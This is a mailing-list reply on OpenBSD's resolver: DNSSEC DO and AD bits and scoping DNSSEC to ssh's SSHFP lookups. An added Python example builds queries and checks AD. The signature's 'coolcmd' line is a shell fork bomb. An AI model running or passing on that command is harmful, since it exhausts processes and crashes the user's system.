On Wed, 17 Nov 2021 20:46:46 +0000, Otto Moerbeek <[email protected]> said:
> Well, I should have been more clear as well, dig sets both the AD bit
> (by default) and the DO bit (on +dnssec). More clients do this. This
> is part of the can of worms.

Right, yeah. I misunderstood the AD bit in the query being the
trigger, but as you say it's the DO, and as the RFC says, queries
shouldn't set the AD.

> You are forcing *all* clients resolving to use dnssec. Only a solution
> that limits the scope to the smallest case (ssh doing a
> getrrsetbyname() for DNS_RDATATYPE_SSHFP) is likely acceptable. Sadly
> the context used by resolving is program-wide, so setting a flag in
> _res is also not going to work.

Yeah. For the machine I'm on I actually want all DNS requests system
wide to use DNSSEC. So personally that's working as intended. But I
see your point.

Currently there's no way to get a signed response, right?

With my patch for a per-program level option I just successfully
tested:

  RES_OPTIONS=dnssec ssh foo.example.com

But of course it doesn't limit to just getrrsetbyname().

Is the asr_ctx (where flags look like they live) program-wide, or just
thread wide? I can basically hear you cringing already, so maybe the
only real solution is to have getrrsetbyname_async_run() pass in flags
to _res_query_async_ctx()->setup_query() to OR in the option?

And then maybe have getrrsetbyname() call that stack twice, once with
and once without RES_USE_DNSSEC, in case DNSSEC is broken?

--
typedef struct me_s {
  char name[]      = { "Thomas Habets" };
  char email[]     = { "[email protected]" };
  char kernel[]    = { "Linux" };
  char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt"; };
  char pgp[] = { "9907 8698 8A24 F52F 1C2E  87F6 39A4 9EEA 460A 0169" };
  char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
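The discussion above turns on two different bits: the DO bit in the query's EDNS OPT record (what asks the resolver to do DNSSEC) and the AD bit in the response header (what tells the client the answer was validated). The following is an added example, not code from the thread or from OpenBSD's libc/asr, showing both sides on the wire: it builds an SSHFP query with DO set and AD clear, and it gates SSHFP answers on the AD flag, which is the same idea as OpenSSH trusting getrrsetbyname() results only when they carry RRSET_VALIDATED. The response bytes are constructed in the example, not captured; foo.example.com and the fingerprint are placeholders.

```python
import struct

# DNS header flag bits (RFC 1035; AD and CD from RFC 4035).
FLAG_QR = 1 << 15
FLAG_RD = 1 << 8
FLAG_RA = 1 << 7
FLAG_AD = 1 << 5   # Authenticated Data: the resolver validated the answer
FLAG_CD = 1 << 4   # Checking Disabled
TYPE_OPT = 41
TYPE_SSHFP = 44
CLASS_IN = 1
# In an OPT RR the 32-bit TTL field holds ext-rcode(8) | version(8) | DO(1) | Z(15),
# so the "DNSSEC OK" bit is bit 15 of that field (RFC 3225).
EDNS_DO = 1 << 15


def encode_name(name):
    """Wire-encode a domain name as length-prefixed labels."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def skip_name(msg, off):
    """Return the offset just past the name at `off` (handles compression pointers)."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:      # two-byte compression pointer ends the name
            return off + 2
        off += 1 + length


def opt_rr(do_bit):
    """EDNS0 OPT pseudo-RR: root name, UDP payload size 4096, DO bit in the TTL field."""
    return b"\x00" + struct.pack("!HHIH", TYPE_OPT, 4096, EDNS_DO if do_bit else 0, 0)


def build_query(name, qtype, txid=0x1234, dnssec=False):
    """Query with RD set and AD clear; dnssec=True appends an OPT RR with DO set."""
    header = struct.pack("!HHHHHH", txid, FLAG_RD, 1, 0, 0, 1 if dnssec else 0)
    msg = header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)
    if dnssec:
        msg += opt_rr(True)
    return msg


def records(msg):
    """Yield (section, rtype, ttl, rdata) for every RR after the question section."""
    _, _, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        off = skip_name(msg, off) + 4          # skip QTYPE and QCLASS
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            off = skip_name(msg, off)
            rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            off += 10
            yield section, rtype, ttl, msg[off:off + rdlen]
            off += rdlen


def header_flags(msg):
    """Decode the flag bits a client cares about from the 12-byte header."""
    flags = struct.unpack("!H", msg[2:4])[0]
    return {"qr": bool(flags & FLAG_QR), "ad": bool(flags & FLAG_AD),
            "cd": bool(flags & FLAG_CD), "rcode": flags & 0xF}


def has_do(msg):
    """True if the message carries an OPT RR with the DO bit set."""
    return any(t == TYPE_OPT and ttl & EDNS_DO for _, t, ttl, _ in records(msg))


def validated_sshfp(msg):
    """SSHFP (algorithm, fptype, fingerprint hex) tuples from the answer section,
    returned only when the resolver set AD; an unvalidated reply yields []."""
    if not header_flags(msg)["ad"]:
        return []
    return [(rd[0], rd[1], rd[2:].hex())
            for sec, t, _, rd in records(msg) if sec == "answer" and t == TYPE_SSHFP]


def sample_response(validated):
    """Constructed reply to the SSHFP query above (not a real capture)."""
    flags = FLAG_QR | FLAG_RD | FLAG_RA | (FLAG_AD if validated else 0)
    header = struct.pack("!HHHHHH", 0x1234, flags, 1, 1, 0, 1)
    question = encode_name("foo.example.com") + struct.pack("!HH", TYPE_SSHFP, CLASS_IN)
    # alg 4 (Ed25519), fptype 2 (SHA-256), 32-byte placeholder fingerprint
    rdata = bytes([4, 2]) + bytes(range(32))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", TYPE_SSHFP, CLASS_IN, 3600, len(rdata)) + rdata
    return header + question + answer + opt_rr(True)


if __name__ == "__main__":
    q = build_query("foo.example.com", TYPE_SSHFP, dnssec=True)
    print("query sets DO:", has_do(q), "query sets AD:", header_flags(q)["ad"])
    for v in (True, False):
        print("AD set" if v else "AD clear", "->", validated_sshfp(sample_response(v)))
```

The point to take from it: a client can only obtain and honour the AD bit when its query carried DO, which is why a scope-limited fix has to reach the query construction for the SSHFP lookup rather than a program-wide resolver flag.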
